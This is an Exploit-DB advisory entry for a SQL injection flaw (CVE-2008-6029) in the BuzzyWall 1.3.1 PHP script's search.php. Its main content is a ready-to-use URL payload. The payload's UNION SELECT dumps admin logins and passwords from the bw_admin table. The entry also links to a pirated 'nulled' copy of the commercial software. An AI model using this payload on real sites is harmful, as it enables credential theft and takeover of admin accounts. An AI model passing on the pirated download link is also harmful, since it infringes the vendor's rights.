BuzzyWall <= 1.3.1 search.php search SQL Injection Vulnerability

2008-09-22T00:00:00
ID EDB-ID:6527
Type exploitdb
Reporter ~!Dok_tOR!~
Modified 2008-09-22T00:00:00

Description

BuzzyWall <= 1.3.1 (search.php search) SQL Injection Vulnerability. CVE-2008-6029. Webapps exploit for php platform

                                        
                                            BuzzyWall &lt;= 1.3.1 SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Date found: 31.08.08
Product: BuzzyWall
Version: 1.3.1
Price: 40$
URL: www.buzzscripts.com
Download script: http://nullstore.net/Reaper/4ptp1chdeais/BuzzyWall.v1.3.1.Nulled.rar.html
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit:

http://localhost/[installdir]/search.php?search=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,login,password),user(),9,10,11,12,13,14,15,16+from+bw_admin/*

# milw0rm.com [2008-09-22]